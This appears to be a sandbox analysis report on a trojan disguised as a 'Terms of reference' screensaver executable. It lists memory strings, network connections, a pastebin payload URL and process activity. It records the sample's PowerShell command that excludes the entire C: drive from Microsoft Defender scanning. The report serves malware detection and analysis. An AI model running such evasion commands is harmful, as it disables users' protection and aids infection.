00000000.00000002.3166713900.000002980BD91000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159537261.00000257739B1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160343247.00000298086C1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160412636.0000029808700000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165358680.000002980BAC0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160552630.00000298087D1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime/blob/bbc898f3e5678135b242faeb6eefd8b24bf04f3c/src/native/corehost/
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166893087.000002980BE32000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime/issues/50820
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime/issues/71847
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mono/linker/issues/378
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mono/linker/pull/649
Source: powershell.exe, 00000004.00000002.2110018131.000001F700C32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.2153023770.0000029BC5704000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2181689526.000001F710074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2181689526.000001F7101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2324712543.0000014450B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.2110018131.000001F700C32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
Source: powershell.exe, 00000004.00000002.2187986324.000001F767229000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/WHKzW2nr
Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 59791
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 59790
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown | Network traffic detected: HTTP traffic on port 59790 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 59791 -> 443
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF848F1EB7D NtWriteVirtualMemory, 4_2_00007FF848F1EB7D
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Code function: 0_2_00007FF6483B306F | 0_2_00007FF6483B306F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF848FF30E9 | 2_2_00007FF848FF30E9
Source: Terms_of_reference_06_01_2025_samsung.scr.exe | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Source: Terms_of_reference_06_01_2025_samsung.scr.exe | Binary or memory string: OriginalFilename vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159462177.0000025773990000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.ComponentModel.Primitives.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159219363.0000025773920000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Runtime.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160308073.00000298086B0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.IO.FileSystem.DriveInfo.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164582542.000002980B9F1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Threading.Overlapped.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168744151.000002980CA01000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Memory.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165424131.000002980BAD0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Xml.ReaderWriter.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166578673.000002980BD50000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Reflection.Emit.ILGeneration.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165031754.000002980BA61000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Sockets.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160289396.00000298086A1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.IO.FileSystem.DriveInfo.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166397720.000002980BD21000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Runtime.Serialization.Primitives.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160570585.00000298087E0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Diagnostics.Tracing.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Private.DataContractSerialization.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159289915.0000025773940000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameNETdesign.dll4 vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159050978.0000025772122000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameWorkTeam.dll2 vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166713900.000002980BD91000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Linq.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159537261.00000257739B1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160343247.00000298086C1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Threading.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160412636.0000029808700000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Console.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165358680.000002980BAC0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Threading.ThreadPool.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160552630.00000298087D1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Diagnostics.Tracing.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Security.Claims.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160491827.0000029808791000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Primitives.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159637398.0000025773A11000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Security.Principal.Windows.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3188522957.00007FF6A81B8000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamemscordaccore.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3188522957.00007FF6A81B8000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameWorkTeam.dll2 vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165182661.000002980BAA1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.NameResolution.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168389200.000002980C5F0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.ServicePoint.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161453512.0000029808CA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Memory.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164662084.000002980BA00000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.Overlapped.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160232189.0000029808681000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.InteropServices.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163793512.000002980B770000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Security.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160623783.0000029808800000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.Primitives.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163937013.000002980B7C1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Security.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167936851.000002980C4B0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.Registry.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164385610.000002980B931000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Security.Cryptography.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164742088.000002980BA10000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.NameResolution.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166461733.000002980BD30000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Runtime.Serialization.Primitives.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167883026.000002980C490000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Reflection.Primitives.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165666377.000002980BB01000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Collections.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167964729.000002980C4D0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Management.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159264890.0000025773931000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameNETdesign.dll4 vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167851335.000002980C481000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Reflection.Primitives.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160394554.00000298086E1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Collections.NonGeneric.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166604611.000002980BD60000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Linq.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164868495.000002980BA20000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Sockets.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159195195.0000025773911000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Runtime.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159001590.0000025772101000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.Registry.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163503853.000002980B710000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Diagnostics.DiagnosticSource.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165863155.000002980BB21000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Runtime.Loader.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160361987.00000298086D0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Threading.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163977952.000002980B810000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Private.Uri.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160451868.0000029808721000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Console.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165504033.000002980BAE0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Collections.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160514082.00000298087B0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Primitives.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163102585.000002980B590000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Http.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Security.Claims.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168246148.000002980C5C0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Collections.Specialized.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164131315.000002980B850000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163286392.000002980B641000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Http.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167776836.000002980C420000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Text.RegularExpressions.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163418543.000002980B6F1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Private.Uri.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Private.DataContractSerialization.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166308984.000002980BD10000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Runtime.Loader.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160252767.0000029808690000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Runtime.InteropServices.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159598217.00000257739F0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Security.Principal.Windows.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167376562.000002980C121000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Private.Xml.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168866320.000002980D111000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.SystemEvents.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167910590.000002980C4A0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Memory.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168187257.000002980C5A1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Collections.Specialized.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164058288.000002980B831000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168032463.000002980C521000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Management.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168130282.000002980C590000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Threading.Thread.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168774305.000002980CA20000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Collections.NonGeneric.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163706047.000002980B741000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Diagnostics.DiagnosticSource.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159402983.0000025773960000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3158687208.0000025771EE1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.Primitives.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159341485.0000025773951000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.ComponentModel.Primitives.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166893087.000002980BE20000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Private.Xml.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165286031.000002980BAB1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Threading.ThreadPool.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166830112.000002980BDC1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Text.RegularExpressions.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166519143.000002980BD41000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Reflection.Emit.ILGeneration.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168102003.000002980C581000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Threading.Thread.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164165214.000002980B870000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Security.Cryptography.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168325428.000002980C5E1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.ServicePoint.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160601511.00000298087F1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Xml.ReaderWriter.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: classification engine | Classification label: mal100.troj.expl.evad.winEXE@14/17@5/5
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | File created: C:\Users\user\AppData\Roaming\notification_sent.flag
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1972:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6660:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2qaqmihi.pjk.ps1
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Terms_of_reference_06_01_2025_samsung.scr.exe | ReversingLabs: Detection: 59%
Source: Terms_of_reference_06_01_2025_samsung.scr.exe | Virustotal: Detection: 55%
Source: Terms_of_reference_06_01_2025_samsung.scr.exe | String found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
Source: unknown | Process created: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe "C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe"
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
